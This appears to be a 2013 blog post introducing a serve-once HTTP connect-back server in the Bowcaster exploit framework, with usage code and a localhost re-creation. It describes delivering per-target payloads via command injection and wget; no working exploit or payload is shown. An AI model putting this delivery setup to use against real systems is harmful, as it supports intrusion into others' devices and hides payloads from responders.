Wednesday, October 09, 2013

A Connect-back HTTP Exploit Server for Bowcaster

I've just added a module to Bowcaster that I think is cool. Actually, I just got around to finishing a module that was there all along. It's a basic HTTP server module, but it has some unique features that make it suitable for serving payloads to remotely exploited targets.

The connect-back server modules in Bowcaster are designed to run asynchronously so that they can be used right in line with your exploit code. Basically the model is this:
  1. Instantiate connect-back server.
  2. Call server.serve(), which returns immediately.
  3. Do other stuff, e.g., throw exploit.
  4. Call server.wait()
  5. That's it. There is no step 5.
The HTTPConnectbackServer module fits this model as well. You provide it a list of payloads to serve, and it forks into the background and serves them each exactly one time. Once all the files have been served, the server terminates.

The use case that I envisioned is a situation where you're exploiting one or more targets via command injection. Your exploit would execute the wget command on the system to fetch a payload, and then a subsequent command injection would execute the downloaded payload.

Perhaps you're even exploiting multiple targets where each target gets its own customized version of the payload. Provide a list of custom payload files, and once every target has phoned home to get its payload, the server shuts down.

Using it is pretty straightforward. Here's an example:

import sys
from bowcaster.servers.http_server import HTTPConnectbackServer

# One payload file per target; each one is served exactly once.
files_to_serve=["payload_192.168.0.1",
                "payload_192.168.0.2",
                "payload_192.168.0.3"]

try:
    httpd=HTTPConnectbackServer("192.168.0.10",
                                 files_to_serve=files_to_serve,
                                 docroot="/www/payloads")
    httpd.serve()  # forks into the background and returns immediately
except Exception:
    #Uh oh. Couldn't start the server.
    #Do all the payload files exist?
    sys.exit(1)

try:
    # throw_exploit_N() stand for your own exploit routines; they are not shown here.
    throw_exploit_1()
    throw_exploit_2()
    throw_exploit_3()
    httpd.wait()  # blocks until every payload has been fetched once
except Exception:
    #something went wrong; stop the server so it doesn't linger
    httpd.shutdown()
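To make the serve-once-then-exit model concrete, here is a small stand-alone re-creation of it in plain Python. It is an added example, not Bowcaster's own HTTPConnectbackServer code: it keeps the payloads in memory instead of reading a docroot, binds to localhost on a free port, and uses threads rather than a fork, but the serve()/wait() contract is the same.

```python
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.error import HTTPError
from urllib.request import urlopen

class OneShotHandler(BaseHTTPRequestHandler):
    """GET /<name> delivers that payload once; later requests for it get 404."""
    def do_GET(self):
        srv, name = self.server, self.path.lstrip("/")
        with srv.lock:
            if name not in srv.payloads or name in srv.served:
                self.send_error(404)      # unknown name, or already delivered
                return
            srv.served.add(name)
            body = srv.payloads[name]
            all_done = len(srv.served) == len(srv.payloads)
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)
        if all_done:
            srv.done.set()                # last payload out: let wait() return
    def log_message(self, *args):         # keep the example quiet
        pass

class OneShotServer(ThreadingHTTPServer):
    """Constructed stand-in for the serve()/wait() model; payloads kept in memory."""
    def __init__(self, payloads, host="127.0.0.1", port=0):
        super().__init__((host, port), OneShotHandler)
        self.payloads, self.served = dict(payloads), set()
        self.lock, self.done = threading.Lock(), threading.Event()
    def serve(self):                      # start in the background, return at once
        threading.Thread(target=self.serve_forever, daemon=True).start()
        threading.Thread(target=self._stop_when_done, daemon=True).start()
    def _stop_when_done(self):
        self.done.wait()
        self.shutdown()                   # stop accepting once everything is served
    def wait(self, timeout=None):         # block until every payload was fetched once
        return self.done.wait(timeout)

def run_demo():  # constructed run: fetch a, fetch a again (refused), fetch b, wait()
    srv = OneShotServer({"payload_a": b"echo a\n", "payload_b": b"echo b\n"})
    srv.serve()
    port, results = srv.server_address[1], []
    for name in ("payload_a", "payload_a", "payload_b"):
        try:
            results.append(urlopen(f"http://127.0.0.1:{port}/{name}", timeout=5).status)
        except HTTPError as err:
            results.append(err.code)
    return results, srv.wait(timeout=5)
```

The repeat request for payload_a gets a 404 because the file is gone from the server's point of view once it has been delivered, and the server stops listening after the last one goes out; an incident responder who later tries to pull a payload from a server like this will get nothing, so the copy on the affected host is the one to preserve.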

Anyway, stay tuned, because I have some other neat Bowcaster stuff in the pipeline as well.